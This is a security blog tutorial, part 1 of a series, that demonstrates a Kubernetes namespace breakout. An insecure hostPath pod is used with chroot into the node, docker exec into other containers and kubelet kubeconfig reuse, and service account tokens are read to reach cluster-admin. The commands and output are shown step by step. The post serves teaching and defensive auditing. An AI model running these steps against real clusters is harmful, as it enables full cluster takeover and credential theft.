Kubernetes Namespace Breakout using Insecure Host Path Volume — Part 1

Abhisek Datta
Published in
6 min readMar 18, 2020


This is Part 1 of a 2 part series on security implications of insecure hostPath volume mount in Kubernetes and how it can be abused for full cluster compromise.

Part 2 deals with the mitigation

In this article we will demonstrate a technique leveraging different components of Kubernetes to break-out from Namespace based restrictions enforced on a user using RBAC. Specifically the scenario involves

  1. Attacker has access to execute commands in a container in a Pod — This is very common, when an attacker has managed to compromise any one application hosted in a cluster
  2. The Pod service account allows CRUD operations on Pod resource but within a single namespace only — This means the attacker in the Pod can create new Pods but within a specific namespace only. This is common for developer service accounts that are restricted to their team’s namespace.

Given this scenario, we will demonstrate techniques using which it is possible to abuse hostPath volume mounts for a Pod to escape the namespace constraints and gain access to Pods in any other namespace. This ability can in turn be leveraged to eventually gain maximum privilege in the cluster i.e. Cluster Admin.

Abusing hostPath volume mounts for a Pod namespace escape Video

Video demo available at — https://asciinema.org/a/O5BJhisLohs9hP9E8ic5IyUDv

Vulnerable Environment Setup

# Create service account with role bindings
kubectl apply -f sa.yml
# Create kubeconfig for service account
./sa-to-kubeconfig.sh > /tmp/research/developer-kubeconfig

The config above creates a Namespace developers , a Service Account developer-sa and binds Role to allow CRUD on Pod resource to developer-sa but restricted only to the developers Namespace.

Attacker Starting Point

As attacker in the scenario, we will start by having access to the cluster using the kubeconfig generated for developer-sa above. This is equivalent to having access to any container in a Pod with the service account attached to it.

The commands below demonstrate how we setup our environment to use developer-sa and verified that we have limited access to developers namespace.

# Use the kubeconfig for developer service account
export KUBECONFIG=developer-kubeconfig
# Check if we can create Pod in default namespace
kubectl auth can-i create pod
# Check if we can list secrets in kube-system
kubectl get secrets -n kube-system
Error from server (Forbidden): secrets is forbidden: User "system:serviceaccount:developers:developer-sa" cannot list resource "secrets" in API group "" in the namespace "kube-system"# Check if we can create Pod in developers namespace
kubectl auth can-i create pod --namespace developers

Our objective is to breakout of this namespace restriction and gain access to containers in Pods assigned to kube-system namespace.

Namespace Escape Steps

We will use hostPath volume feature of Kubernetes to deploy a Pod in developers namespace but with the underlying Node’s / (root filesystem) mounted inside our Pod at /host. We will also use additional features of Pod such as hostIPC, hostPID, hostNetwork to allow us access to all processes in the underlying Node. Our PodSpec (pod-to-node.yml) that we use in the exampe below is available here.

kubectl apply -f pod-to-node.yml -n developers
> pod/attacker-pod created

We then exec into this newly created Pod and chroot our process to the Node’s root filesystem accessible to us in /host directory due to hostPath volume mount.

kubectl -n developers exec -it attacker-pod bash
root@pool-qt7kkl8wt-zn6c:/# echo "We are inside attacker Pod: $(uname -n)"We are inside attacker Pod: pool-qt7kkl8wt-zn6croot@pool-qt7kkl8wt-zn6c:/# chroot /host/ bash

At this point we can access all Docker Containers running in the node irrespective of which Pod or Namespace they belong to.

root@pool-qt7kkl8wt-zn6c:/# docker psCONTAINER ID        IMAGE                                        COMMAND                  CREATED             STATUS              PORTS               NAMES
622b9f408fde ubuntu "/bin/sh -c 'sleep i…" 8 minutes ago Up 8 minutes k8s_attacker-pod_attacker-pod_developers_d261db9d-84e4-4b73-83fb-dbf42444e4d4_0
e329436b98dc k8s.gcr.io/pause:3.1 "/pause" 8 minutes ago Up 8 minutes k8s_POD_attacker-pod_developers_d261db9d-84e4-4b73-83fb-dbf42444e4d4_0
15cd09d41f2e 19adb8dca61e "cilium-agent --kvst…" 28 minutes ago Up 28 minutes k

This is because

  1. We have used chroot to change the Root Directory of our process to that of Node’s Root Directory
  2. Now all PATHS in the Node matches our PATH setting and accessible to our process
  3. We can access the docker binary and docker socket available in the Node’s filesystem as if we are logged in directly to the Node.

The implication is we can use docker exec to run commands inside any container running in the Node irrespective of which Namespace they belong to. In addition to this, we can use nodeName or nodeSelector in PodSpec to schedule our Pod to any Node of our choosing, thereby gain access to ANY container in ANY Pod running in the entire cluster.

Privilege Escalation

We have gained an attack primitive where we can deploy a Pod, which is scheduled in arbitrary Node by Kubernetes. Through the Pod, we are able to access the Node’s Docker daemon and in turn have full access to any container running on the Node.

Once we have access to Kubelet configuration in a Node, we can leverage its kubeconfig to list ALL nodes in the cluster.

root@pool-qt7kkl8wt-zn6c:/# kubectl \
--kubeconfig=/etc/kubernetes/kubelet.kubeconfig get nodes -o wide

This lists all Node in the cluster

pool-qt7kkl8wt-zn67 Ready <none> 162m v1.16.6 Debian GNU/Linux 9 (stretch) 4.19.0-0.bpo.6-amd64 docker://18.9.2
pool-qt7kkl8wt-zn6c Ready <none> 162m v1.16.6 Debian GNU/Linux 9 (stretch) 4.19.0-0.bpo.6-amd64 docker://18.9.2

We can use the same config to list ALL Pods in the cluster

root@pool-qt7kkl8wt-zn6c:/# kubectl \
--kubeconfig=/etc/kubernetes/kubelet.kubeconfig get pods -A

This lists all Pods in the cluster

NAMESPACE     NAME                                    READY   STATUS             RESTARTS   AGE
developers attacker-pod 1/1 Running 0 113m
kube-system cilium-c29np 1/1 Running 0 164m
kube-system cilium-operator-cdd855d45-x7mxk 0/1 CrashLoopBackOff 43 166m
kube-system cilium-tsm2z 1/1 Running 0 164m
kube-system coredns-84c79f5fb4-67lbh 1/1 Running 0 166m

At this point, we just have to look for a Pod with a privileged token (Service Account) and deploy our Attacker-Pod in the same Node as the target Pod. This can be easily achieved by combining above information about Nodes, Pods and using nodeSelector PodSpec.

Through our Attacker-Pod deployed in the same Node as a privileged Pod (ideally a Pod with a Service Account that has Cluster-Admin Role attached), we can access the Service Account Token available in the Pod and access the cluster with its privileges.

# Get service account token
cat /var/run/secrets/kubernetes.io/serviceaccount/token
# Get cluster CA certificate
cat /var/run/secrets/kubernetes.io/serviceaccount/ca.crt

The above information can be used, along with cluster-info to generate a kubeconfig using which an attacker can interact with the API server. Refer to our script for generating kubeconfig


We will discuss cluster wide strategy to mitigate this issue in part two of this series. We will dig deeper into Kubernetes PodSecurityPolicies and how it can be used to restrict insecure volume mounts.

At Appsecco we provide advice, testing and training around software, infra, web and mobile apps, especially that are cloud hosted. We specialise in auditing Kubernetes clusters as per the CIS Benchmark to create a picture of the current state of security. If you are confident about the security of your cluster get assurance for withstanding real world attackers by getting us to do a black box pentest.

We run a hands-on training course “Attacking and Auditing Kubernetes Clusters” for cluster operators and pentesters.

Drop us an email, contact@appsecco.com if you would like us to assess the security of your K8S infrastructure or if you would like your security team trained in advanced pentesting techniques against K8S.


